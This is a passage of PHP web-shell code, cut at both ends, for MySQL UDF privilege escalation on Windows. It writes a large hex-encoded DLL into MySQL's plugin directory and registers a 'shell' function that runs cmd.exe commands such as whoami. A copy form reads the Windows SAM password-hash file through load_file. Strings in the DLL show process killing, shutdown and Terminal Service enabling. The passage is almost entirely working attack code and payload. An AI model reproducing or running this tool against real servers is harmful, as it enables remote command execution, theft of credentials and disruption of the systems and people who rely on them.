'true'; $row = mysql_fetch_row($meta); $_SESSION['plugindir'] = str_replace('\\','\\\\',str_replace('/','\\',$row[1])).'\\\\udf.dll'; echo '<font color=white>'.str_replace('/','\\',$row[1]).'</font>'; echo ' (mysql over 5.1, udf.dll can only dump to plugin_dir) '; if (isset($_SESSION['notsame'])) echo ' <font><b><i>[maybe dump dll will be failed!]</i></b></font>'; else { if (!file_exists(str_replace('/','\\',$row[1]))) echo ' <a href="?action=cplug&dir='.base64_encode(str_replace('/','\\',$row[1])).'">Create PluginDir</a>'; else echo ' exists!'; } } echo '<br/>'; if (!isset($_SESSION['notsame']) && !isset($_SESSION['over51'])) echo '<b>path</b>:<font color=green><b>'.getenv('path').'</b></font><br/>'; $meta = mysql_query('select 1,1,1,1 from mysql.user union select * from mysql.func'); if (mysql_num_rows($meta)==0) echo '<b>Mysql.Func</b> : <font color=white><b><i><font color=red>dont exist!</font></i></b></font> must <a href="?action=func">create</a> mysql.func first!'; else echo '<b>Mysql.Func</b> : <font color=green>exist!</font>'; echo '<br/>'; echo '<b>grants</b> : <font color=white>'; $meta = mysql_query('show grants;',$conn); while ($row = mysql_fetch_row($meta)) { echo $row[0]; } echo '</font>'; echo '</div>'; if ($close) mysql_close($conn); echo '<br/>'; if (isset($_POST['path'])) { $path = $_POST['path']; if (get_magic_quotes_gpc()) $path = stripslashes($path); } else $path = isset($_SESSION['plugindir']) ? $_SESSION['plugindir'] : 'c:\\\\windows\\\\system32\\\\udf.dll'; echo '<div style="border:solid 1px #333;background-color:#999;padding:4px"><form action="" method="post"><input type="hidden" name="action" value="install"><input type="text" name="path" size="60" value="'.$path.'"> <input type="submit" value="Dump UDF"></form>'; echo '<form action="" method="post"><input type="hidden" name="action" value="exec"><input type="hidden" name="dump" value="d"><input type="text" name="sql" size="60" value="CREATE FUNCTION shell RETURNS STRING SONAME \'udf.dll\'"> <input type="submit" value="Create Function"></form>'; echo '<form action="" method="post"><input type="hidden" name="action" value="copy"><input type="text" value="c:\\\\WINDOWS\\\\repair\\\\sam" name="source" size=30> <input type="text" name="target" size=30> <input type="submit" value="Copy"> <font color=white>please convert \\ to \\\\</font></form></div>'; if (isset($_POST['sql'])) $sql = $_POST['sql']; else $sql = 'select * from mysql.user'; if (get_magic_quotes_gpc()) $sql = stripslashes($sql); if (isset($_POST['dump'])) $sql = 'select shell(\'cmd\',\'whoami\')'; echo '<form action="" method="post"><input type="hidden" name="action" value="exec"><textarea id="sql2" cols="100" rows="5" name="sql">'.$sql.'</textarea><br/><input type="submit" value="Mysql_query"> <input type="button" value="Load_File" onclick="loadfile()"> <input type="button" value="Into OutFile" onclick="outfile()"></form>'; } function cplug(){ $path = $_GET['dir']; $path = base64_decode($path); $arr = explode('\\',$path); $p = ''; $err = ''; for ($index = 0,$count = count($arr);$index<$count;$index ) { $p .= ($arr[$index] . '\\'); if (!file_exists($p)) { if (!mkdir($p)) { $err = 'create '.$p.'failed !'; break; } } } conn(); if ($err != '') exit($err); if (file_exists($path)) echo 'plugin_dir create success !'; else echo 'plugin_dir create failed !'; } function execsql() { $conn = conn(false); $sql = $_POST['sql']; if (get_magic_quotes_gpc()) $sql = stripslashes($sql); $rs = mysql_query($sql,$conn); echo mysql_info($conn); if (@mysql_num_rows($rs) > 0) { echo '<table border="1">'; $cols = mysql_num_fields($rs); $index = 0; echo '<tr>'; while ($index < $cols) { echo '<th>'.mysql_field_name($rs,$index).'</th>'; $index ; } echo '</tr>'; while ($row = mysql_fetch_row($rs)) { $index = 0; echo '<tr>'; while ($index < $cols) { echo '<td>'; echo str_replace(chr(13),'<br/>',htmlspecialchars($row[$index])); echo '</td>'; $index ; } echo '</tr>'; } echo '</table>'; } if (mysql_errno($conn) != 0) echo mysql_error(); mysql_close($conn); } function cp(){ $conn = conn(false); $source = $_POST['source']; $target = $_POST['target']; if (get_magic_quotes_gpc()) { $source = stripslashes($source); $target = stripslashes($target); } mysql_query('select unhex(hex(load_file("'.$source.'"))) into dumpfile "'.$target.'"'); if (mysql_errno($conn) != 0) echo mysql_error().'<br/>'; else echo 'done !'; mysql_close($conn); } function install() { //dump udf.dll $conn = conn(false); $path = $_POST['path']; if (get_magic_quotes_gpc()) $path = stripslashes($path); mysql_query('create table udftmp (c blob)'); if (mysql_errno($conn) != 0) { echo mysql_error().'<br/>'; mysql_query('drop table udftmp'); mysql_close($conn); exit(); } mysql_query('insert into udftmp values(convert(0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000080100000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000007148657F35290B2C35290B2C35290B2C35290B2C3F290B2CF626562C31290B2C4E35072C34290B2C5A36012C31290B2CB635052C36290B2C5A360F2C31290B2C5A36002C34290B2C5736182C3E290B2C35290A2C56290B2CF6266B2C38290B2CF626572C34290B2CF626512C34290B2C5269636835290B2C00000000000000000000000000000000504500004C010400BFC7514B0000000000000000E0000E210B01070A00220000001C0000000000002D300000001000000040000000000010001000000002000004000000000000000400000000000000008000000004000000000000020000000000100000100000000010000010000000000000100000002052000070000000A44A0000B40000000000000000000000000000000000000000000000000000000070000064020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004000004C0100000000000000000000000000000000000000000000000000002E746578740000000C210000001000000022000000040000000000000000000000000000200000602E7264617461000090120000004000000014000000260000000000000000000000000000400000402E64617461000000500000000060000000020000003A0000000000000000000000000000400000C02E72656C6F630000080400000070000000060000003C00000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000558BEC83EC14578D45FC506A28FF156040001050FF151C4000108B450CF7D81BC083E0028945F88D45F050FF7508C745EC010000006A00FF15204000106A006A006A108D45EC506A00FF75FCFF15244000108BF885FF7500FF75FCFF15A44000108BC75FC9C3558BEC81EC8004000053568B35804000105733DB538D45D4508D45EC5033FF8D45F44750885DFF885DFEC745D40C000000895DD8897DDCFFD685C00F84F3000000538D45D4508D45E4508D45F050FFD685C00F84DC0000008D458050FF15844000108B45F08945B88B45EC8945C08945BC8D45C4508D458050535353575353FF750CC745AC010100005366895DB0FF158840001085C00F84980000008B3534400010C645FF01FFD68B3D8C4000108945E8EB67395DF87642B8000400003945F872038945F8538D45E050FF75F88D8580FBFFFF50FF75F4FF159040001085C07453FF75E08B4D088B018D9580FBFFFF52FF5004FFD68945E8EB1853FF75C4FF159440001085C0742CFFD62B45E83B4510731E6A07FF159C400010538D45F850535353FF75F4895DF8FFD785C07585EB04C645FE01FF15A0400010385DFF8B35A44000108BF8741E385DFE740F395D14740A53FF75C4FF15A8400010FF75C8FFD6FF75C4FFD6395DF07405FF75F0FFD6395DEC7405FF75ECFFD6395DE47405FF75E4FFD6395DF47405FF75F4FFD657FF15B04000105F5E33C05BC9C3837C24040274138B44240C8B08686041001050FF51085959EB48568B74240C57566A02E8A2010000050004000050FF1508410010FF76048BF8685041001057FF15044100106A0168E02E000057FF742438E80FFEFFFF57FF150041001083C42C5F5E33C0C3837C24040274138B44240C8B08687C41001050FF51085959EB1A8B4424086A0068D0070000FF7004FF742418E8CFFDFFFF83C41033C0C38BC18B4C24048948088B4C240889480C8A4C240CC70098410010884804C7401002000000C20C00C70198410010C3F644240401568BF1C70698410010740756E8021C0000598BC65EC20400565733FF8BF147397E087E52807E04008B460C8B04B88A08741D80F92F740580F92D753440803800742EFF74240C50FF150C410010EB1B80F92F740580F92D7517408038007411FF74240C50FF15F840001085C05959740D473B7E087CAE32C05F5EC20400B001EBF756578BF1836614006A025F397E087E62807E04008B460C8B44B8FC8A08741D80F92F740580F92D753440803800742EFF74240C50FF150C410010EB1B80F92F740580F92D7517408038007411FF74240C50FF15F840001085C059597408473B7E087CADEB0D8B460C8B04B847894614897E108B46145F5EC20400565733FF33F6397C240C7E188B442410FF34B8E8111B0000473B7C2410598D7406017CE85F8BC65EC333C0390510600010740D5050A310600010FF15444100108B0D24600010E89A0E00008B4C240489410C32C0C38B442404FF700C8B0D24600010E875180000C3558BEC518B0D246000108365FC00568B7514568D45FC508B450CFF7008FF308B4508FF700CE80F190000833EFF7516837DFC00740DFF75FCE8841A0000598906EB038326008B45FC8B551885C00F94C1880A5EC9C3837C240801752B8B4424046A2CA320600010E85B1A000085C05974098BC8E879180000EB0233C085C0A324600010752AEB2B837C24080075218B0D2460001085C97417568BF1E8BE17000056E80A1A000083252460001000595E33C040C20C00558BEC83EC1453578D45F8506A08FF750833DB895DF8895DF4FF151C4000108BF83BFB7467568B35144000108D45FC5053536A01FF75F8895DFCFFD6395DFC8BF87648FF75FCE8C7190000598D4DFC51FF75FC8945F4506A01FF75F8FFD68BF83BFB74278D45EC508D45F050FF750C8D451450FF75108B45F4C745F004010000FF3053FF15184000108BF85E395DF87409FF75F8FF15A4400010395DF47409FF75F4E854190000598BC75F5BC9C38B4424048B0868A041001050FF51085959C3558BECB838250000E85B1900006683A5D4FDFFFF006683A5D8FEFFFF005356576A4033C0598DBDD6FDFFFFF3AB66AB6A4033C0598DBDDAFEFFFFF3AB33DB43395D0C66AB8BC3C645FD00C645FA00C645FF00C645FE00C645FB00C645FC008945F40F86B30000008B75108B3DFC400010C1E0028B0C3080392D75710FBE510183EA6B743A4A74314A7562837D0C030F8C900000008A490280F970C645FA01741280F97375478B443004C645FE018945DCEB3AC645FF01EB1DC645FD01EB2E837D0C037C670FBE490283E96E74144949751BC645FB01FF743004FFD7598945ECEB0B8B443004C645FC018945E08B45F4403B450C8945F40F8274FFFFFF807DFD007530807DFF00752A807DFE007524807DFB00751E807DFC007518FF7508E8CCFEFFFFEB4368CC420010EB3268B0420010EB2B53689C420010E81BF9FFFF59598D45E45068001000008D85C8DAFFFF50E8E619000085C0751768804200108B45088B0850FF510859598BC3E9B30200008365F400F745E4FCFFFFFF0F86A00200008D9DC8DAFFFFBE04010000FF338B3D384000106A006810040000FFD785C089450C0F84640200008365E80068001000008D85C8EAFFFF6A0050E89A170000568D85D4FDFFFF6A0050E88B170000568D85D8FEFFFF6A0050E87C170000568D85D0FCFFFF6A0050E86D170000568D85CCFBFFFF6A0050E85E170000568D85D4FDFFFF508D85D8FEFFFF50FF750CE82FFDFFFF83C44C8D45E85068001000008D85C8EAFFFF50FF750CE80819000085C0742C568D85D0FCFFFF50FFB5C8EAFFFFFF750CE8E8180000568D85CCFBFFFF50FFB5C8EAFFFFFF750CE8CC180000807DFB0074078B45EC3903741C807DFC007463FF75E08D85CCFBFFFF50FF15CC40001085C05959754DFF750CFF15A4400010FF336A006A01FFD785C08B7D0889450C74358B078D8DD0FCFFFF518D8DD4FDFFFF518D8DD8FEFFFF51FF33687042001057FF500883C4186A00FF750CFF15A8400010EB038B7D08807DFD0074258B078D8DD0FCFFFF518D8DD4FDFFFF518D8DD8FEFFFF51FF33687042001057FF500883C418807DFF0074148B45EC3B03750D8B07685442001057FF50085959807DFA000F84DE0000008365F000F745E8FCFFFFFF0F86CD000000807DFF0074568B45EC3B030F85BC000000568D85C8FAFFFF6A0050E8031600008B7DF083C40C568D85C8FAFFFF508DBCBDC8EAFFFFFF37FF750CE8BA170000FF378B45088B088D95C8FAFFFF52684442001050FF51088B7D0883C410807DFE007459568D85CCFBFFFF508B45F0FFB485C8EAFFFFFF750CE87717000085C0743BFF75DC8D85CCFBFFFF50FF15EC40001085C0595974258B078D8DD0FCFFFF518D8DD4FDFFFF518D8DD8FEFFFF51FF33687042001057FF500883C4188B45E8FF45F0C1E8023945F00F8233FFFFFFFF750CFF15A44000108B45E4FF45F4C1E80283C3043945F40F826BFDFFFF33C05F5E5BC9C3558BEC51568D45FC50681900020033F656FF750CFF7508FF150840001085C075278D451850FF75145656FF7510FF75FCFF150C40001085C07403897518FF75FCFF1510400010EB038975188B45185EC9C3558BEC5151538B5D10578D45FC50FF750C33FF397D20FF7508897DF87508FF1528400010EB2FFF152C40001085C0757957578D4514505753FF75FCFF150C40001085C07564837D2002750E53FF75FCFF150040001085C07550837D1401568B35044000107406837D1402751CFF7518E860140000594050FF7518FF75145753FF75FCFFD685C07520837D140475136A048D451C506A045753FF75FCFFD685C07507C745F8010000005EFF75FCFF15104000108B45F85F5BC9C3558BEC51576810430010FF15404000108BF885FF744A53568B353C40001068FC42001057FFD68BD885DB743268E842001057FFD68BF085F674248D45FC506A016A016A13FFD63D7C0000C0750C8D45FC506A006A016A13FFD6FF7508FFD35E5B5FC9C3566A016870430010E8B7F4FFFF8B7424108B06685843001056FF50088B44241C33C983C4103BC175135151FF152C41001085C075566844430010EB3083F8017514516A06FF152C41001085C0753D6830430010EB1783F802751B516A0CFF152C41001085C07524681C4300108B0656FF500859EB1583F80375046A01EB0783F80475086A02E813FFFFFF5933C0405EC3558BEC837D0C027C288B45108B400480382D751D4050FF15FC40001085C0597C1083F8047F0B50FF7508E841FFFFFFEB0E8B45088B08688843001050FF5108595933C05DC3A13060001085C0752168504400106844440010FF154040001050FF153C40001085C0A3306000107501C36A01FF74240C6A00FFD00FB6C0C3A12860001085C07521686C4400106860440010FF154040001050FF153C40001085C0A3286000107501C36A01FF742408FFD0C3558BEC83EC6456578D45E8508D45E4506A0133FF5757E85D1400003BC78945DC751F8B75088B3EFF15A040001050681045001056FF570883C40C33C0E929010000538B5D088B0368B844001053FF5008397DE88B75E45959897DF00F86FD0000008D45EC508D45FC506A0E897DFC897DF8897DF4FF3657E8F61300008D45EC508D45F8506A0AFF3657E8E41300008D45EC508D45F4506A05FF3657E8D2130000FF7608E825FFFFFF5957576A208D4D9C51508945E0FF15E4400010598D44000250FF75E05757FF15444000108B45FC83380275280FB64809510FB64808510FB648070FB6400651508D45BC68AC44001050FF150441001083C418EB118D45BC68A444001050FF150441001059598B038D4D9C518D4DBC51FF75F8FF75F4FF7604FF36687C44001053FF500883C420FF75FCE836130000FF75F8E82E130000FF75F4E82613000057E82013000083C60CFF45F08B45F03B45E80F8203FFFFFFFF75E4E8061300008B45DC5B5F5EC9C3560FB774240C85F674426A00566A006A0468E045001068984500106802000080E811FCFFFF83C41C85C08B4424088B08740F56686445001050FF510883C40C5EC3683C45001050FF510859595EC3558BEC83EC0C8365F8008365FC0056576A048D45FC50BF9C460010576870460010BE0200008056C745F401000000E864FBFFFF83C41485C07449837DFC0275436A048D45FC5057684046001056E845FBFFFF83C41485C0742A837DFC0275246A048D45F8506834460010BF004600105756E821FBFFFF83C41485C07406837DF800750432C0EB246A048D45F45068EC4500105756E8FEFAFFFF83C41485C07504B001EB07837DF4000F94C05F5EC9C3E84CFFFFFF84C0B9D04600107505B9C44600108B4424048B105168A446001050FF520883C40CC3558BEC83EC108D45FC5068190002006A0068984500106802000080C745F83D0D0000C745F004000000C745F450000000FF150840001085C075488D45F4508D45F8508D45F0506A0068E0450010FF75FCFF150C40001085C0751FFF75F88B45088B0868F046001050FF510883C40CFF75FCFF1510400010C9C3FF75FCFF15104000108B45088B0868D846001050FF51085959C9C3FF742404E83CFFFFFF59E95DFFFFFF515355565733DB536A02536A04BF9C460010576870460010BE0200008056E84CFAFFFF536A02536A0457684046001056E83AFAFFFF8944244833C0385C24546A010F94C0BF0046001050536A0468EC4500105756E816FAFFFF8BE883C4543BEB7406385C241C742133C0385C241C530F95C050536A0468344600105756E8EDF9FFFF83C41C3BC375043BEB7420395C2410741A385C241C8B4424188B0874076850470010EB126830470010EB0B8B4424188B08680C47001050FF510859595F5E5D5B59C3B802310010E8D10E000083EC18837D0C027D158B45088B0868A047001050FF51085959E9EE00000053565733F656FF75108D4DDCFF750CE8ECF1FFFF68984700108D4DDC8975FCE890F2FFFF8B5D0833FF4785C07415FF75F08BF7FF15FC4000105053E80DFDFFFF83C40C68904700108D4DDCE8FBF1FFFF84C0740357EB1368884700108D4DDCE8E7F1FFFF84C0740C6A00538BF7E8A2FEFFFF595968804700108D4DDCE8CAF1FFFF84C07409538BF7E878FEFFFF5968784700108D4DDCE8B0F1FFFF84C07409538BF7E838FBFFFF5968704700108D4DDCE8FFF1FFFF85C07415FF75F08BF7FF15FC4000105053E8A9FAFFFF83C40C85F6750D8B0368A047001053FF50085959834DFCFF8D4DDCE83CF1FFFF5F5E5B8B4DF433C064890D00000000C9C3568B7424108326006A106890490010FF742414E8BF0D000083C40C85C075108B44240889068B0850FF510433C0EB05B8024000805EC20C008B44240483C00450FF1548400010C20400568B742408578D460450FF154C4000108BF885FF750D85F674098B066A018BCEFF500C8BC75F5EC20400F644240401568BF1C70680490010740756E8C10C0000598BC65EC20400568BF18B861C0100005733FF3BC7740D50FF155840001089BE1C0100008B86180100003BC7740D50FF15A440001089BE180100005757576A0457FF760CFF15544000103BC7898618010000750433C0EB15575757681F000F0050FF155040001089861C0100005F5EC383B91C0100000074128B490C83F9FF740A6A0051FF155C400010C333C0C351FF1548400010C38B4424048B1534600010EB028BC18B48083BCA75F7C38B4424048B1534600010EB028BC18B083BCA75F8C38B5424048B02568B700889328B70083B353460001074038956048B72048970048B49043B51045E7505894104EB0F8B4A043B51087505894108EB028901895008894204C20400568BF18B0E83791400750D8B410439480475058B4108EB1E8B013B0534600010740D50E867FFFFFF59EB0B89068BC88B41043B0874F589065EC3568BF18B0E8B41083B0534600010740D50E855FFFFFF59EB1389068BC88B41043B480874F48B0E394108740289065EC38B44240485C0740E8B4C24088B1189108B4904894804C353568BF133DB895E04C74608A049001068C849001053C706B8490010C74608AC490010FF15D8400010834E0CFF5959885E10899E18010000899E1C010000C78614010000010000008BC65E5BC3558BECB800200000E80C0B00008D451050FF750C8D8500E0FFFF50FF15D44000108B4D088B1183C40C508D8500E0FFFF50FF5204C9C3568BF1E814000000F644240801740756E8A10A0000598BC65EC20400568BF18B861C01000085C0C706B8490010C74608AC490010740750FF15584000108B861801000085C0578B3DA4400010740350FFD78B460C83F8FF740350FFD783BE14010000005F740F8D4610803800740750FF15AC400010C706804900105EC3566820010000E8450A000085C059740B8BC8E8E9FEFFFF8BF0EB0233F685F674068B0656FF50048BC65EC3558BEC518365FC00837D0CFF568BF1750CFF7508E8060A00005989450C837E04FF75106A016A008D4EF8E82100000085C074186A008D45FC50FF750CFF7508FF7604FF15984000108B45FC5EC9C20800558BEC81EC04010000568BF1578DBE1C0100008B0785C0740A50FF15584000108327008DBE180100008B0785C0538B1DA4400010740650FFD38327008B460C83F8FF740750FFD3834E0CFF83BE1401000000740F8D4610803800740750FF15AC400010837D08007412FF75088D7E1057E8E2090000595933DBEB278D85FCFEFFFF506804010000FF156C4000108D7E105733DB53538D85FCFEFFFF50FF156840001053536A02535368000000C057FF156440001083F8FF89460C5B7507C6070033C0EB0C8B450C89861401000033C0405F5EC9C208008B5424048B4208568B308972088B303B353460001074038956048B72048970048B49043B51045E7505894104EB0E8B4A043B1175048901EB038941088910894204C204008B41048B48048B15346000103BCA741A568B7424088B3639710C7D058B4908EB048BC18B093BCA75EE5EC204005356578B7C24103B3D346000108BD98BF7741DFF76088BCBE8E3FFFFFF8B3657E8520800003B3534600010598BFE75E35F5E5BC20400558BEC83EC105356894DF8578B7D0C8D4D0CE8AAFCFFFF8B37A1346000103BF08D5F08897DFC895DF475048B33EB188B0B3BC8741251E8F1FBFFFF8945FC83C0088B30598945F48D4DF0FF15B84000108B45FC3BC774608B0F8941048B0F89083B037505894604EB178B48048B55F4894E048B480489318B0B890A8B0B8941048B5DF88B4B043979047505894104EB0E8B4F04393975048901EB038941088B4F048948048B48148B5714895014894F14897DFC8BC7EB7B8B48048B55F8894E048B4A043979047505897104EB0E8B4F04393975048931EB038971088B4A043939894DF475238B1B3B1D3460001075078B5F048919EB1256E830FBFFFF8B55F8598B4DF489018B45FC8B5A04397B08751F8B0F3B0D3460001075088B4F04894B08EB0D56E8EEFAFFFF8943088B45FC598B5DF833FF473978140F850B010000E9B9000000397E140F85FA0000008B4E048B013BF075728B410883781400751A8978148B460483601400FF76048BCBE8E7FDFFFF8B46048B40088B0839791475088B4808397914746E8B480839791475178B0889791483601400508BCBE8A1FAFFFF8B46048B40088B4E048B49148948148B4E048979148B4008897814FF76048BCBE894FDFFFFEB7F8378140075198978148B460483601400FF76048BCBE860FAFFFF8B46048B008B4808397914751C8B083979147515836014008B76048B43043B70040F853BFFFFFFEB3C8B0839791475178B480889791483601400508BCBE836FDFFFF8B46048B008B4E048B49148948148B4E048979148B00897814FF76048BCBE8FBF9FFFF897E148D4DF0FF15BC400010FF75FCE8E7050000FF4B0C8B4508598B4D0C5F5E89085BC9C20800558BEC51568BF1837E0C008B4D0C74388B46043B087531394510752CFF70048BCEE837FDFFFF8B0D346000108B46048948048B460483660C0089008B46048940088B46048B08EB253B4D107420578BF98D4D0CE8FCF9FFFF578D45FC508BCEE82FFDFFFF8B4D0C3B4D1075E25F8B450889085EC9C20C00558BEC5156578B7D0C578BF1E8A8FCFFFF8B76043BC689450C740C8B0F3B480C7C058D450CEB068975FC8D45FC8B088B45085F89085EC9C20800558BEC51515356576A188BF9E8290500008BF05933DB8D4DF8895E04C74614010000008975FCFF15B8400010391D346000107513893534600010891EA134600010895DFC895808FF05386000108D4DF8FF15BC400010395DFC7409FF75FCE8C0040000598B35346000106A18E8C9040000897004895814894704895F0C5989008B47045F5E8940085BC9C3558BEC5356576A188BD9E8A00400008B7510FF75148BF883671400897704A1346000108907A1346000108947088D470C50E812F9FFFF83C40CFF430C3B730474258B450C3B0534600010751A8B45148B003B460C7C10897E088B43043B7008751C897808EB17893E8B43043BF075088978048B4304EBEA3B30750289388B43043B78048BF70F84B00000008B4604837814000F85A30000008B50048B0A3BC175598B4A0883791400751E8B560433C0408942148941148B46048B4004836014008B46048B7004EB673B7008750A8BF0568BCBE8D9FAFFFF8B4604C74014010000008B46048B4004836014008B4604FF70048BCBE8A0F7FFFFEB358379140074AA3B30750A8BF0568BCBE88AF7FFFF8B4604C74014010000008B46048B4004836014008B4604FF70048BCBE881FAFFFF8B43043B70040F8550FFFFFF8B43048B4004C74014010000008B450889385F5E5B5DC21000558BEC51568BF18B46048B0850518D45FC508BCEE857FDFFFFFF7604E8230300008366040083660C00598D4DFC33F6FF15B8400010FF0D38600010750D8B3534600010832534600010008D4DFCFF15BC40001085F6740756E8E7020000595EC9C3558BEC515356578BF98B47048B70048BD8A1346000103BF0B201741C8B4D0C8B093B4E0C8BDE0F9CC284D274048B36EB038B76083BF075E9807F08007405FF750CEB2684D28BCB894DFC74128B47043B1874EB8D4DFCE8CEF6FFFF8B4DFC8B510C8B450C3B107D195053568D450C508BCFE8D5FDFFFF8B088B4508C6400401EB078B4508C64004005F5E89085BC9C20800568BF18D461450FF15704000108D4E045EE9F8FEFFFF558BEC515153568BF18D461457508945F8FF15784000108D4508508D45FC8D5E04508BCBE8B6FCFFFF8B7DFC3B7E0874198B471085C074068B0850FF5108578D4508508BCBE8B1F9FFFFFF75F8FF15744000105F5E5BC9C20400558BEC5151FF750C8D45F850E8EEFEFFFF8B45088B4DF889088A4DFC884804C9C20800568BF18D4E04C6410800E88DFCFFFF8326008D461450FF157C4000108BC65EC3558BEC83EC108B45088B008365FC008945F88D45F8508D45F050E89EFFFFFF8B0083C010C9C20400558BEC518B4518568B75148326008308FF837D0C00894DFC750CA1146000108906E94A010000538B1DCC400010578B7D1068784A0010FF37FFD385C059590F842301000068744A0010FF37FFD385C059590F8410010000E8E2F6FFFF8BF085F6750E8B4514C700644A0010E9FE00000068604A0010FF37FFD385C0595975158D46085057FF750CE809E4FFFF83C40CE99700000068584A0010FF37FFD385C05959750F8D46085057FF750CE84AE4FFFFEBDA684C4A0010FF37FFD385C05959750F57FF750C8D460850E892EDFFFFEBBC68484A0010FF37FFD385C05959750F57FF750C8D460850E850E7FFFFEB9E68404A0010FF37FFD385C05959750F57FF750C8D460850E8FFF1FFFFEB808D7E088B0768284A001057FF50088B0759596AFFFF35146000108BCFFF50048BCEE88BF3FFFF8B4D1489018BCEE8E8F3FFFF8B5DFC8B4D188D7B14578901FF15784000108D4508508D4B04E87CFEFFFF578930FF1574400010EB07A11460001089065F5B33C05EC9C21400FF742404E80200000059C3FF2500410010FF25F4400010FF25F0400010FF25E8400010CCCCCCCCCCCCCCCCCCCC513D001000008D4C2408721481E9001000002D0010000085013D0010000073EC2BC88BC485018BE18B088B400450C3CCFF25C4400010CCCCCCCCCCCCCCCCCCCC6AFF5064A100000000508B44240C64892500000000896C240C8D6C240C50C3CCFF25E0400010FF25DC400010FF25D04000108B44240885C0750E39053C6000107E2EFF0D3C6000108B0D1041001083F8018B09890D40600010753F6880000000FF150841001085C059A348600010750433C0EB66832000A14860001068046000106800600010A344600010E8EA000000FF053C6000105959EB3D85C07539A14860001085C074308B0D44600010568D71FC3BF072128B0E85C97407FFD1A14860001083EE04EBEA50FF150041001083254860001000595E6A0158C20C00558BEC538B5D08568B750C578B7D1085F67509833D3C60001000EB2683FE01740583FE027522A14C60001085C07409575653FFD085C0740C575653E815FFFFFF85C0750433C0EB4E575653E80BE4FFFF83FE0189450C750C85C07537575053E8F1FEFFFF85F6740583FE037526575653E8E0FEFFFF85C0750321450C837D0C007411A14C60001085C07408575653FFD089450C8B450C5F5E5B5DC20C00FF25C8400010FF2524410010FF2518410010FF251C410010FF2520410010FF2538410010FF253C410010FF25344100108D4DDCE9C2E1FFFFB8884A0010E934FEFFFF00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000BE4F0000AC4F00009C4F0000884F00007A4F0000644F0000504F00003C4F0000244F00000C4F0000DE4F0000D04F000000000000724D0000824D0000904D0000A24D0000B24D0000C84D0000E04D0000F84D0000084E00001E4E0000304E00005E4D00004C4E00005A4E00006E4E00007E4E0000964E0000AE4E0000C64E0000504D00003E4D00002C4D00001C4D0000104D0000FA4C0000EE4C0000E64C0000D64C0000C84C0000B44C00003E4E0000A44C000000000000325000001850000000000000D65000003A51000022510000185100000C51000000510000F4500000EA500000CC500000C2500000B8500000A85000009E50000092500000645000006C500000745000007E5000008850000046510000000000006C510000845100009A5100005651000000000000F04E000000000000E2510000B4510000C451000000000000FC4F00000000000000000000636D642E657865202F6320257300000055736167653A636D6420226E65742075736572220D0A0D0A0000000055736167653A6578656320226E65742075736572220D0A0D0A000000CB120010000000000D0A7073202D6C0920C1D0B3F6CBF9D3D0BDF8B3CC0D0A7073202D6D73206E616D650920C1D0B3F6BCD3D4D8C1CBD6B8B6A8C4A3BFE9C3FBB5C4BDF8B3CC0D0A7073202D6D70207069640920C1D0B3F6D6B8B6A8BDF8B3CCB5C4CBF9D3D0C4A3BFE90D0A7073202D6B70207069640920B9D8B1D5D2BBB8F6BDF8B3CC0D0A7073202D6B6E206E616D650920B9D8B1D5CBF9D3D0D6B8B6A8B5C4BDF8B3CCC3FB0D0A0000002573093C3078252E38583E0D0A0000004D6F64756C65506174680942617365416464726573730D0A0000000025640925735C25730925730D0A000000456E756D50726F6365737365732829206572726F722E0D0A000000005365446562756750726976696C656765000000007073202D6B6E206E616D650D0A7073202D6B70207069640D0A0000007073202D6D73206E616D650D0A7073202D6D70207069640D0A00000052746C41646A75737450726976696C65676500005A7753687574646F776E53797374656D000000004E54444C4C2E444C4C0000004661696C656420546F2053687574646F776E00004661696C656420546F205265626F6F74000000004661696C656420546F204C6F676F66660000000049732054616B696E6720506C6163652E2E2E2E2E2E0D0A00536553687574646F776E50726976696C656765000000000055534147453A0D0A20202020202073687574646F776E205B202D30313233345D0D0A2020202020202D30202020206C6F676F66662E0D0A2020202020202D31202020207265626F6F742E0D0A2020202020202D3220202020706F7765726F66662E0D0A2020202020202D33202020207375706572207265626F6F742E0D0A2020202020202D342020202073757065722073687574646F776E2E0D0A6578616D706C653A0D0A20202020202073687574646F776E202D330D0A0000000077696E7374612E646C6C000057696E53746174696F6E5265736574005554494C444C4C2E646C6C00537472436F6E6E656374537461746500252D3131642020252D3133732020252D3133732020252D3133732020252D313573202025730D0A00202020200000000025642E25642E25642E25640053657373696F6E49442020202053657373696F6E4E616D6520202020557365724E616D6520202020202020436C69656E744E616D6520202020202020495020202020202020202020202020202053746174650D0A00000000456E756D6572617465205465726D696E616C2053657373696F6E73204661696C65642E2025640D0A000000004661696C20546F20536574204E6577205465726D696E616C205365727669636520506F72740D0A00546865205465726D696E616C205365727669636520506F727420486173204265656E2053657420546F2025640D0A00000000000053595354454D5C43757272656E74436F6E74726F6C5365745C436F6E74726F6C5C5465726D696E616C205365727665725C57696E53746174696F6E735C5244502D54637000000000506F72744E756D62657200006644656E795453436F6E6E656374696F6E73000053595354454D5C43757272656E74436F6E74726F6C5365745C436F6E74726F6C5C5465726D696E616C20536572766572000000005453456E61626C656400000053595354454D5C43757272656E74436F6E74726F6C5365745C53657276696365735C5465726D5365727669636500000053595354454D5C43757272656E74436F6E74726F6C5365745C53657276696365735C5465726D44440000000053746172740000005465726D696E616C2053657276696365205374617475733A2025730D0A00000044697361626C656400000000456E61626C6564005265674F70656E4B65794578204572726F722E0D0A0000005465726D696E616C205365727669636520506F72743A2025640D0A00536574204E6577205465726D696E616C2053657276696365204661696C65640D0A000000536574205465726D696E616C20536572766963652044697361626C65640D0A00536574205465726D696E616C205365727669636520456E61626C65642E0D0A006C6F676F6666000071756572790000007669657700000